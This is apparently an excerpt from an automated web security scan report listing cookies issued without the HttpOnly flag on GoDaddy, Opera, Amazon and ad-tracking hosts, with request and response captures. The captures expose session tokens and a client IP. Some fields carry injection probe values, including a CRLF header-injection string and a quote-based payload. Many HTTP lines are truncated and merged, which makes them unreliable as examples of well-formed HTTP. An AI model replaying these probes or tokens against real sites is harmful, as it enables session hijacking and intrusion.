GET /ads/ads.js?uid=TVYMYp4lQTRs9JsS_40691941 HTTP/1.1.doubleclick.net/pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226341&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2Fportal%2Ftabs%2F%3Ftab_name%3DNews&dt=1316208341657&bpp=148&shv=r20110907&jsv=r20110914&correlator=1316208341881&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=320694430&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=739&ady=181&biw=1131&bih=870&eid=36887102&ref=http%3A%2F%2Fportal.opera.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=240&xpc=Nxfq0ro1Gs&p=http%3A//portal.opera.com;q=0.3-9b1f-be5afaba100a
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=B5098A49587B3A6D5F19777D607A999A; Path=/ =UTF-8"undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){...[SNIP]...
11.2. https://email.secureserver.net/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://email.secureserver.net
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:PHPSESSID=d25fc93ae88ce9e1cd32f84099433d38; path=/; domain=email.secureserver.net
Request
GET / HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 302 FoundSet-Cookie: PHPSESSID=d25fc93ae88ce9e1cd32f84099433d38; path=/; domain=email.secureserver.net server.net/?app=wbe
11.3. http://event.adxpose.com/event.flow
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://event.adxpose.com
Path:
/event.flow
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=2076FD0E24E3F3A4C9EF9E52B2F34912; Path=/
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-3796773913386149%26output%3Dhtml%26h%3D250%26slotname%3D1161958565%26w%3D300%26lmt%3D1316226341%26flash%3D10.3.183%26url%3Dhttp%253A%252F%252Fportal.opera.com%252Fportal%252Ftabs%252F%253Ftab_name%253DNews%26dt%3D1316208341657%26bpp%3D148%26shv%3Dr20110907%26jsv%3Dr20110914%26correlator%3D1316208341881%26frm%3D4%26adk%3D265923585%26ga_vid%3D1095286181.1316208009%26ga_sid%3D1316208009%26ga_hid%3D320694430%26ga_fc%3D1%26u_tz%3D-300%26u_his%3D2%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D20%26u_nmime%3D100%26dff%3Darial%26dfs%3D12%26adx%3D739%26ady%3D181%26biw%3D1131%26bih%3D870%26eid%3D36887102%26ref%3Dhttp%253A%252F%252Fportal.opera.com%252F%26prodhost%3Dgoogleads.g.doubleclick.net%26fu%3D0%26ifi%3D1%26dtd%3D240%26xpc%3DNxfq0ro1Gs%26p%3Dhttp%253A%2F%2Fportal.opera.com&uid=TVYMYp4lQTRs9JsS_40691941&xy=0%2C0&wh=300%2C250&vchannel=59371577&cid=3941858&iad=1316208343619-68901827069930740&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1.doubleclick.net/pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226341&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2Fportal%2Ftabs%2F%3Ftab_name%3DNews&dt=1316208341657&bpp=148&shv=r20110907&jsv=r20110914&correlator=1316208341881&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=320694430&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=739&ady=181&biw=1131&bih=870&eid=36887102&ref=http%3A%2F%2Fportal.opera.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=240&xpc=Nxfq0ro1Gs&p=http%3A//portal.opera.com;q=0.3-9b1f-be5afaba100a
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=2076FD0E24E3F3A4C9EF9E52B2F34912; Path=/ =UTF-8"TVYMYp4lQTRs9JsS_40691941");
11.4. http://img.godaddy.com/image.aspx
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://img.godaddy.com
Path:
/image.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:fb_session=d0d8de1ca73e3dfc7228ecbe&S_TOUCH=09/16/2011 18:07:20&pathway=c300561b-e09a-4c96-8e0e-ac74afbb6017; path=/ actioncount=d0d8de1c964083c62476d317; domain=.godaddy.com; path=/ fb_actioncount=d0d8de1c3e2452299539dc20; path=/ app_pathway=d0d8de1c713e614c609a8053; domain=.godaddy.com; path=/ visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:07:20 GMT; path=/
Request
GET /image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB181&privatelabelid=1&status=200&rand=0.189218924934612&page=%2fdefault.aspx&split=19 HTTP/1.1/*;q=0.5;q=0.7&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=19
Response
HTTP/1.1 200 OK964083c62476d317; domain=.godaddy.com; path=/e1c3e2452299539dc20; path=/713e614c609a8053; domain=.godaddy.com; path=/Set-Cookie: fb_session=d0d8de1ca73e3dfc7228ecbe&S_TOUCH=09/16/2011 18:07:20&pathway=c300561b-e09a-4c96-8e0e-ac74afbb6017; path=/ Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:07:20 GMT; path=/ ..,...........D..;
11.5. http://img.godaddy.com/image.aspx
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://img.godaddy.com
Path:
/image.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:fb_session=S_TOUCH=09/16/2011 18:07:39&pathway=2a590ae0-0ee8-47bd-8061-af016da64611&V_DATE=09/16/2011 11:07:19; path=/ isc=d0d8de1c8075e63937e1be01; domain=.godaddy.com; path=/ visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:07:39 GMT; path=/
Request
GET /image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB181&privatelabelid=1&status=200&rand=0.479543640035923&page=%2fproductadvisor%2fpastart.aspx&referrer=http%3a%2f%2fwww.godaddy.com%2fgdshop%2fsite_search.asp%3fci%3d9104%26pageNum%3d1%26searchFor%3dxss&ci=13108&split=19&querystring=ci%3d13108 HTTP/1.1/*;q=0.5;q=0.7/productadvisor/pastart.aspx?ci=13108&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/16/2011 18:07:29&pathway=2a590ae0-0ee8-47bd-8061-af016da64611&V_DATE=09/16/2011 11:07:19; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=0&fMajorVer=0&slMajorVer=-1&slMinorVer=-1; domainYardVal=%2D1; serverVersion=A
Response
HTTP/1.1 200 OKSet-Cookie: fb_session=S_TOUCH=09/16/2011 18:07:39&pathway=2a590ae0-0ee8-47bd-8061-af016da64611&V_DATE=09/16/2011 11:07:19; path=/ Set-Cookie: isc=d0d8de1c8075e63937e1be01; domain=.godaddy.com; path=/ Set-Cookie: visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:07:39 GMT; path=/ ..,...........D..;
11.6. http://img.godaddy.com/pageevents.aspx
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://img.godaddy.com
Path:
/pageevents.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:fb_session=S_TOUCH=09/16/2011 18:06:35&pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5&V_DATE=09/16/2011 11:05:34; path=/ isc=eebc2%0d%0a0acfdd19135; domain=.godaddy.com; path=/ visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:08:29 GMT; path=/
Request
GET /pageevents.aspx?page_name=/domains/search.aspx&ci=15014&eventtype=&ciimpressions=&usrin=&r=0.45087383035570383&comview=0 HTTP/1.1/domains/search.aspx;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/16/2011 18:06:35&pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5&V_DATE=09/16/2011 11:05:34; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1
Response
HTTP/1.1 200 OKSet-Cookie: fb_session=S_TOUCH=09/16/2011 18:06:35&pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5&V_DATE=09/16/2011 11:05:34; path=/ Set-Cookie: isc=eebc2%0d%0a0acfdd19135; domain=.godaddy.com; path=/ Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sat, 15-Sep-2012 18:08:29 GMT; path=/ ..,...........D..;
11.7. http://img.secureserver.net/image.aspx
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://img.secureserver.net
Path:
/image.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:fb_session=S_TOUCH=09/16/2011 18:09:35&pathway=d990793e-d1e7-4b97-a94a-94399c0b4c8b&V_DATE=09/16/2011 11:09:35; path=/ pathway=d990793e-d1e7-4b97-a94a-94399c0b4c8b; domain=.secureserver.net; path=/ visitor=vid=d990793e-d1e7-4b97-a94a-94399c0b4c8b; domain=.secureserver.net; expires=Sat, 15-Sep-2012 18:09:35 GMT; path=/
Request
GET /image.aspx?page=%2Farticle%2F5246&site=help.securepaynet.net&server=m1plgdhelp003&querystring=plid%3D&status=200&article_id=5246&locale=en&topic_id=168 HTTP/1.1.net/topic/168/article/5246?plid=;q=0.3
Response
HTTP/1.1 200 OK-4b97-a94a-94399c0b4c8b; domain=.secureserver.net; path=/Set-Cookie: fb_session=S_TOUCH=09/16/2011 18:09:35&pathway=d990793e-d1e7-4b97-a94a-94399c0b4c8b&V_DATE=09/16/2011 11:09:35; path=/ Set-Cookie: visitor=vid=d990793e-d1e7-4b97-a94a-94399c0b4c8b; domain=.secureserver.net; expires=Sat, 15-Sep-2012 18:09:35 GMT; path=/ ..,...........D..;
11.8. http://mct.rkdms.com/sid.gif
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://mct.rkdms.com
Path:
/sid.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:sessionid=h-1fe0eb546ed368ebf937b670b69487dc_t-1316190637; domain=.rkdms.com; path=/; expires=Sat, 15-Sep-2012 16:30:37 GMT
Request
GET /sid.gif?mid=drugstore&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1/*;q=0.5;q=0.7
Response
HTTP/1.1 200 OK-revalidateSet-Cookie: sessionid=h-1fe0eb546ed368ebf937b670b69487dc_t-1316190637; domain=.rkdms.com; path=/; expires=Sat, 15-Sep-2012 16:30:37 GMT .rkdms.com/w3c/p3p.xml", CP="CURa ADMa DEVa OUR COM NAV INT CNT STA NID DSP NOI COR", policyref="http://www.rkdms.com/w3c/p3p.xml", CP="CURa ADMa DEVa OUR COM NAV INT CNT STA NID DSP NOI COR", policyref="http://www.rkdms.com/w3c/p3p.xml", CP="CURa ADMa DEVa OUR COM NAV INT CNT STA NID DSP NOI COR"..,...........D..;
11.9. http://portal.opera.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://portal.opera.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:csrftoken=838dab485752a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:19:20 GMT; Max-Age=31449600; Path=/
Request
GET / HTTP/1.1/company//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/
Response
HTTP/1.1 200 OK,Accept-Encoding/static/misc/yadis.xrdfSet-Cookie: csrftoken=838dab485752a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:19:20 GMT; Max-Age=31449600; Path=/ ...[SNIP]...
11.10. http://portal.opera.com/portal/tabs/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://portal.opera.com
Path:
/portal/tabs/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:csrftoken=838dab485752a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:24:54 GMT; Max-Age=31449600; Path=/
Request
GET /portal/tabs/?tab_name=News HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; csrftoken=838dab485752a3df29256e939fd2d3cb; opal_sessionid=46086d7992e13cfe7e9bdef9bd665ed5; __utma=258618251.1095286181.1316208009.1316208009.1316208009.1; __utmb=258618251.1.10.1316208016; __utmc=258618251; __utmz=258618251.1316208016.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OK,Accept-Encoding/static/misc/yadis.xrdfSet-Cookie: csrftoken=838dab485752a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:24:54 GMT; Max-Age=31449600; Path=/ ...[SNIP]...
11.11. https://portal.opera.com/accounts/login/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://portal.opera.com
Path:
/accounts/login/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:csrftoken=838dab485752a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:25:28 GMT; Max-Age=31449600; Path=/ opal_sessionid=46086d7992e13cfe7e9bdef9bd665ed5; expires=Fri, 30-Sep-2011 16:25:28 GMT; Max-Age=1209600; Path=/
Request
GET /accounts/login/ HTTP/1.1/portal/tabs/?tab_name=Opera%20Portal/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; opal_sessionid=46086d7992e13cfe7e9bdef9bd665ed5; csrftoken=838dab485752a3df29256e939fd2d3cb; __utma=258618251.1095286181.1316208009.1316208009.1316208009.1; __utmb=258618251.2.10.1316208016; __utmc=258618251; __utmz=258618251.1316208016.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OK,Accept-Encoding/static/misc/yadis.xrdfSet-Cookie: csrftoken=838dab485752a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:25:28 GMT; Max-Age=31449600; Path=/ Set-Cookie: opal_sessionid=46086d7992e13cfe7e9bdef9bd665ed5; expires=Fri, 30-Sep-2011 16:25:28 GMT; Max-Age=1209600; Path=/ ...[SNIP]...
11.12. http://tracking.searchmarketing.com/welcome.asp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://tracking.searchmarketing.com
Path:
/welcome.asp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ASPSESSIONIDQQTQTQTR=MKBNBMLBEPHLKEDKBIMJKOBF; path=/
Request
GET /welcome.asp?SMCID=319&x=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1.com/*;q=0.5;q=0.7%2D4c6a%2Dad4b%2De3f3832a70c5&AID=&LastVisitDate=9%2F6%2F2011+2%3A58%3A45+PM&SMCID=13000392
Response
HTTP/1.1 200 OKSet-Cookie: ASPSESSIONIDQQTQTQTR=MKBNBMLBEPHLKEDKBIMJKOBF; path=/ !.......,...........T..;
11.13. http://www.amazon.com/gp/loader/jsonp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.amazon.com
Path:
/gp/loader/jsonp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT session-id=188-7348060-9795407; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT ubid-main=189-8322294-4852542; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT
Request
GET /gp/loader/jsonp?c=assoc_retail_asset_preload HTTP/1.1-amazon.com/images/G/01/associates/widgets/20070822/US/html/preload_retail_asset._V152385065_.html;q=0.3.337409241.1315233673.1315233673.1315236916.2; __utmz=194891197.1315236916.2.2.utmccn=(referral)|utmcsr=aws-portal.amazon.com|utmcct=/gp/aws/html-forms-controller/contactus98dd2'%3bac3249871a9/aws-account-and-billing|utmcmd=referral; ct-main="?yScNOlWT31nv@QGPOP6MZlUTgEuPV67"; 5SnMamzvowels-14730.pos=1; 5SnMamzvowels-14730.time.0=1315237100818; apn-user-id=ad436c0d-3f66-48df-8380-85023e358301; x-main="kYmMgX@s6zRSHrgXsrT2Jct5JsIxFj@7"; aws-ubid-main=189-0212498-8250436; aws-x-main=UsPqM6hqJEtppz2vUlxJzQS7UOORf9DA; session-token=SQF/NkehkGMk+jdlo6/NLXrRBtfG2aeSiUcxmLBxdBQ8cmJRMfNGlYkOX0a/N00l4OzAutqHvfb9FBh+fr8MF6/DdmBOr5uYhE9XOogb0pkADN6BRGFMatq2bldyvYdHA3jnepv+7Arl9xnJWdTft1/gFN5GixtGQVw8ONCdfFj7229gWrFCR/ylhyeHArd92XSZrR8ObUdlW6zcVvlI08NLUSNtliR/aHfv+MkySJE2G/JWqf7h9pFBH71guzzVfsd8zXeStVUwsLfl2A70Cg==; ubid-main=189-8322294-4852542; session-id-time=2082787201l; session-id=188-7348060-9795407
Response
HTTP/1.1 200 OK.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "hE0VX4iDZHL0ioPBD7LjGkhf7vqRU0ghhAp4FK1O9i7Z-Agent-4852542; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMTSet-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT Set-cookie: session-id=188-7348060-9795407; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT _preload([
11.14. http://www.conversionruler.com/bin/tracker.php
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.conversionruler.com
Path:
/bin/tracker.php
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:CRSess_1195=6a7cf94741d3046519a9a835b2c68438; expires=Fri, 16-Sep-2011 15:58:09 GMT; path=/ settings1195=a24033a9a7ec9efdebbabf5e0595a819; expires=Wed, 14-Sep-2016 15:28:09 GMT; path=/
Request
GET /bin/tracker.php?siteid=1195&actn=2&refb=http%3A//www.port25.com/&referer=http%3A//www.port25.com/products/prod_pmta4_features.html&ti=Port25%3A%20PowerMTA%3A%20Intelligent%20Outbound%20E-mail%20Gateway&l=en-US&sc=1920x1200-16&j=1&ct=B9GFSj&gmto=300&v=3614&isjs=1&_r=undefined HTTP/1.1/products/prod_pmta4_features.html;q=0.3
Response
HTTP/1.1 200 OK9a7ec9efdebbabf5e0595a819; expires=Wed, 14-Sep-2016 15:28:09 GMT; path=/Set-Cookie: CRSess_1195=6a7cf94741d3046519a9a835b2c68438; expires=Fri, 16-Sep-2011 15:58:09 GMT; path=/
11.15. http://www.ubmlive.com/image/image_gallery
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.ubmlive.com
Path:
/image/image_gallery
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=17F97FC6E17B6C0CEC879DD9BBEDBD99; Path=/
Request
GET /image/image_gallery?uuid=70f2ac69-5c75-4ff4-a6ea-14052c505915&groupId=1482687&t=1302000071949 HTTP/1.1;q=0.3
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=17F97FC6E17B6C0CEC879DD9BBEDBD99; Path=/ .tEXtSoftware.Adobe ImageReadyq.e<...5IDATx.b....} N`...#.~ v........>.0....L...)V.t$^o.....gx;.1......IEND.B`.
11.16. http://ad.yieldmanager.com/pixel
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/pixel
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!$=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; path=/; expires=Sun, 15-Sep-2013 18:08:28 GMT BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Request
